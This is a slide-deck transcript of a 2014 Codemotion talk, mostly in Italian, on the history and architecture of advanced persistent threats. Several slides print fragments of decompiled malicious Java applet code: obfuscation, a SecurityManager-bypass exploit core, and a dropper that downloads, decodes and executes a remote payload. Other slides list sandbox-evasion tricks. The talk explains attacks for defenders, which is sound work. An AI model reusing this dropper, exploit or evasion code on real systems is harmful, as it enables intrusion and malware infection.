the magic world of advanced persistent threat - andrea pompili - codemotion milan 2014
TRANSCRIPT
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
THE MAGIC WORLD OF ADVANCED PERSISTENT THREATS
Andrea Pompili
There are only 10 types of people in the world:
Those who understand binary, and those who don't
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Attacker Zovi) http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Come si sviluppa un attacco?
<#1>
<#2>
<#3>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<1996> The Dark Side of the Moon
http://vx.org.ua/29a/main.html
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / [email protected] / @GRAMMERSoft Group / Manila,Philippines
<2000>
8,7 miliardi di dollari
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Lesson Learned
#1> Dio benedica gli utenti
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<2001> The Nimda Style
Microsoft IIS e PWS Extended Unicode Directory transversal Vulnerability
Microsoft IIS/PWS Escaped Characters Decoding Command Execution Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability TFTP Server
UDP:69
RICHED20.DLL
Microsoft Office 2000 DLL Execution Vulnerability
Microsoft IE MIME Header Attachment Execution Vulnerability
635 milioni di dollari
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Lesson Learned #1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
SQL Server 2000 Desktop Engine
75.000 computer infettati in soli 10 minuti
payload di soli 376 byte (residente esclusivamente in memoria)
1,2 miliardi di dollari
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Lesson Learned #1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
22,6 miliardi di dollari
DDOS contro www.sco.com
Upload&Execute 0x85 0x13 0x3c 0x9e 0xa2
Backdoor TCP 3127-3198 http://echohacker.altervista.org/articoli/mydoom.html
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Lesson Learned #1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<2010-2012> Government in Action
> Stuxnet (2010)
> Duqu (2011)
> Flame (2012)
> Gauss (2012)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Flame: Il Malware più complesso della storia
> 20MB di dimensione (900Kb programma principale/dropper + 16 moduli ad oggi rilevati)
> 80 domini utilizzati come sistemi di Comando e Controllo
> Diffusione via USB Stick (Infectmedia)
> Enumerazione dei dispositivi
Bluetooth (Beetlejuice)
> Registrazione audio (Microbe)
> Windows Update MITM (Munch & Gadget)
MD5 Collision Attack
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Lesson Learned #1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
#5> Il budget di spesa è funzionale al target
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<2007> Storm Worm & CyberCrime Market
http://www.pcworld.com/article/138694/article.html
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Lesson Learned #1> Dio benedica gli utenti
#2> Non bisogna per forza accanirsi sui server
#4> Perché limitarsi a fare danni una sola volta
#5> Il budget di spesa è funzionale al target
#6> La somma fa sempre il Totale
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
http://www.infosecblog.org/2013/01/you-are-the-target/hackedpc2012/
« »
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Launcher
Dropper
Downloader
Module
Command & Control
Exploit
Vector
Module <01>
A General APT Architecture
Infection Stage
Malware Core Module <XX>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Infection Stage> The Botnet Choice
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Infection Stage> Drive-to-Click <#1>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Infection Stage> Drive-to-Click <#2>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Infection Stage> Drive-to-Click <#3>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Drive-to-Click <#5>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Trick#1> Giochiamo con le estensioni
RLO Unicode control character
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Trick#2> Content-Disposition Nightmare
http://www.gnucitizen.org/blog/content-disposition-hacking/
Download Server Response Headers
RFC 2616
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Exploiting> The same old story
> Old Client Vulnerabilities
> Disclosed Client Vulnerabilities without a Patch
> 0-Day Exploit
> 1-Day Exploit PoC
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Make or Buy?
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<applet codebase=“http://blahblah.evilsite.in/hiddenpath/"
archive=“http://blahblah.othersite.in/hiddenpath/
c8c34734f41cca863a972129369060d9” code=“rgmiv”>
A Security day
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
public class xp extends JApplet {
public void init() {
try {
Object aobj[] = new Object[0];
Object obj = gsdfvg.ccla(tcbteokd.fuss(tcbteokd.p), 1);
String s = "hpjwbludyi";
s = "wgpxrwyvzolbb";
s = "zdfmvftloqmakqysyu";
s = "nrrkqnjfylgtljyyferr";
cr.hzumfnc(obj);
Object aobj1[] = new Object[0];
String s1 = "ofvszonrzgelnko";
s1 = "fefhtspcqhj";
s1 = "evztavmzjarjgwu";
Object obj1 = ygigtele.bjixqh(tcbteokd.fuss(tcbteokd.nq), new Class[] {
Integer.TYPE
}).newInstance(new Object[] {
Integer.valueOf(tcbteokd.mdrikbua(9))
});
int ai[] = new int[8];
Object aobj2[] = new Object[7];
aobj2[2] = cr.hzumfnc(obj);
...
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<01> XOR String Encryption
public static String ok = ha.n("1:-:u:,/u26:<>u\b:6+7>\0264?>7");
...
public static String n(String s) {
String s1 = "";
for (int i = 0; i < s.length(); i++)
s1 += idzfihff(s.charAt(i));
return s1;
}
...
public static char idzfihff(char c) {
return (char)(c ^ 0x5b);
}
https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<02> Java Reflection
public static Class fuss(String s) throws Exception {
return Class.forName(s);
}
...
public static Object dngfuv(Method method, Object obj, Object aobj[]) {
return method.invoke(obj, aobj);
}
public static Constructor bjixqh(Class class1, Class aclass[]) {
return class1.getConstructor(aclass);
}
...
https://media.blackhat.com/bh-us-12/Briefings/Oh/ BH_US_12_Oh_Recent_Java_Exploitation_Trends_and_Malware_WP.pdf
Malware
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<03> ClassLoader Override
class t extends ClassLoader {
public static void ujrzjw(t t1, String s) {
try {
Class class1 = t1.defineClass("qbw",
tcbteokd.xcpoalaefqfvuacylvakyi, 0,
tcbteokd.xcpoalaefqfvuacylvakyi.length);
ygigtele.bjixqh(class1, new Class[] {
tcbteokd.fuss("java.lang.String")
}).newInstance(new Object[] { s });
} catch (Exception ex) {
System.exit(0);
}
}
}
Malware
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
...
private static void lcsqyrgtbct (String s, int i) {
String s1 = s + Integer.valueOf(i);
...
rchannel= Channels.newChannel((new URL(s1)).openStream());
...
File file = File.createTempFile("~tmf", null);
FileOutputStream fos= new FileOutputStream(file);
for (int j = 0; j < abyte0.length; j++)
abyte0[j] = (byte)(abyte0[j] ^ 0x29);
fos.write(abyte0);
if (abyte0.length > 1024)
try {
Runtime.getRuntime().exec(new String[] {
"cmd.exe", "/C", file.getAbsolutePath()
});
} catch (IOException ioe) {
(new ProcessBuilder(new String[] {
file.getAbsolutePath()
})).start();
}
The Dropper Class
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Object obj1 = new java.awt.image.DataBufferByte(9);
int[] ai = new int[8];
Object[] oo = new Object[7];
oo[2] = new java.beans.Statement(System.class, "setSecurityManager", new Object[1]);
...
DataBufferByte obj5 = new DataBufferByte(8);
for (int j = 0; j < 8; j++)
obj5.setElem(j, -1);
MultiPixelPackedSampleModel obj6 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,1,1,4,0);
Raster obj7 = Raster.createWritableRaster(obj6, obj5, null);
MultiPixelPackedSampleModel obj8 =
new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE,4,2,1,
0x3fffffdd - (tcbteokd.pi ? 16 : 0), 288 + (tcbteokd.pi ? 128 : 0));
Raster obj9 = Raster.createWritableRaster(obj8, obj1, null);
byte obj10 = new byte[] {0, -1}
IndexColorModel obj11 = new IndexColorModel(1, 2, obj10, obj10, obj10);
CompositeContext obj12 = AlphaComposite.Src.createContext(obj11, obj11, null);
obj12.compose(obj7, obj9, obj9);
The Malware Core
http://valhalla.allalla.com/2013/08/ java-netbeans-applet-integer-overflow-win32-target-added/
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
The Cheaper Path to Exploiting Blackole Exploit Kit
http://en.wikipedia.org/wiki/Blackhole_exploit_kit
Styx Exploit Pack
http://krebsonsecurity.com/2013/07/styx-exploit-pack-domo-arigato-pc-roboto
Neutrino
http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html
Magnitude Exploit Kit
http://malware.dontneedcoffee.com/2013/10/Magnitude.html
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Downloader
Exploit 01
Vector
A General APT Architecture (Exploit Kit)
Infection Stage
Exploit 02 Exploit n
Downloader Downloader
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
The InfoStealer Choice
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
The RAT Choice
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Bitcoin + APT = Ransomware
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
The Command&Control Choice <#1>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
The Command&Control Choice <#2>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
The Command&Control Choice <#3>
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Why not an Antivirus?
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Panic! L encode it
http://upx.sourceforge.net/
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Now things goes better
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
“The truth is, consumer-grade antivirus products can’t
protect against targeted malware created by well-
resourced nation-states with bulging budgets.
They can protect you against run-of-the-mill malware:
banking trojans, keystroke loggers and e-mail worms.
But targeted attacks like these go to great lengths to
avoid antivirus products on purpose”
Mikko Hypponen (F-Secure)
<2012> The Antivirus Maker Confession
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
The Way to Sandboxing
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
<01> USER-MODE AGENT
Software component in a guest operating system (keylogger) <02> KERNEL-MODE PATCHING
Guest operating system Kernel modified for tracing (rootkit) <03> VIRTUAL MACHINE MONITORING
Customized Hypervisor to monitor the guest operating system <04> SYSTEM EMULATION
Hardware emulator to hook appropriate memory, IO functions, peripherals, etc. <05> KERNEL EMULATION
Kernel emulator to hook appropriate system calls, etc.
The Way to Sandboxing
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Una lista (molto) parziale dei Player > Norman Sandbox (Norway 2001)
> FireEye (US 2004)
> Damballa (US 2006)
> Lastline/Anubis/Wepawet (Austria 2006)
> Sandboxie (2006)
> Cuckoo Sandbox (2010)
> VMRay formerly CWSandbox (Germany 2007)
> Joe Security LLC (Switzerland 2007)
> BitBlaze (2008)
> ThreatExpert (Ireland 2008)
> Ether (US 2009)
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Una lista (completamente) parziale degli Evader
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Evading Sandbox 4 Dummies > Human Interaction (UpClicker, December 2012)
> MessageBox (Something that need to be clicked)
> Sleep Calls (Trojan Nap, uncovered in February 2013)
> Time Triggers (Hastati, March 2013 a massive, data-destroying attack in South Korea)
> Check Internet Connection
> Check Volume information and Size
> Check self Executable name
> Execution after reboot
> Check System services, files and communication ports
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Il limite delle Sandbox
Minuti
def: il Paziente Zero è il primo paziente individuato nel
campione della popolazione di un'indagine
epidemiologica…
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Sicuramente meglio che confidare negli utenti
Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/
Andrea Pompili
[email protected] – Xilogic Corp.
MILAN 28-29.11.2014 www.codemotionworld.com
Domande? Italian
مطالب أيةArabic
¿Preguntas? Spanish
Questions? English
tupoQghachmey Klingon
Sindarin
Japanese
Ερωτήσεις? Greek
вопросы? Russian